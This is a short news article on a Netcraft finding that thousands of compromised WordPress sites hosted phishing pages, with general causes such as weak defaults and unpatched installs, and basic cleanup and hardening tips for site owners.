WordPress compromise led to huge phishing wave

Chances are, your WordPress-hosted site has been compromised and you have not yet sensed it.

Security research firm Netcraft has found that almost 12,000 sites running WordPress blogging have been used to spread phishing attacks and malware in February alone. The report does not come as a surprise, however. A vast majority of approximately 30 million domains hosted on WordPress naturally will fall prey to phishing scams due to the easily predictable default username “admin” and the publicly common interface for site administrators, the “wp-admin” or “wp-content”. Perhaps the issue can be helped if WordPress users are given a default username and password that are more difficult to predict – unique combinations of letters and figures.

Site owners are also partly liable. When bloggers download the WordPress software and implement it, a cardinal rule is to keep the tool secure and updated. However, this is not always the case. Many are annoyed by the manual process of upgrading to newer versions of WordPress.

It was not until the release of  version 3.7 of WordPress that websites are able to automatically update themselves on certain conditions and settings. The process is still not immune to zero-day attacks, where hackers work their way through an unreported vulnerability to control the whole WordPress update installation backdoor or modify the settings to block future security updates – all without the site owner knowing that this is happening.

Netcraft’s statistics shows that most of the phishing content is most commonly located in the wp-content directory, where contents of the users are stored, and which is always writable by the web server process, effectively giving access to would-be attackers to drop malicious files in this directory. In other cases, external users can also write in the wp-includes and wp-admin directories if a WordPress installation is not hardened and the plugins outdated.

Sixty percent of phishing websites also distributed scams to Apple through the wp-admin directory while PayPal users were targeted by 25 percent of phishing sites.

How to remove WordPress malware

Like all other malware, there is no one-size-fits-all solution to the one infecting WordPress sites. But some helpful tips might be of help during or after an attack.

1. Change the passwords for the FTP, cpanel and plesk access, as well as overwrite the file contained in the wp-config.php.
2. Always maintain the latest backup for your website, though some hosting companies already do this task themselves.
3. Regularly check the following for compromise: .htaccess file, database scripts and iframes, folders associated with WordPress installations
4. Detect malware problems using the Google Chrome and Google Webmaster tools.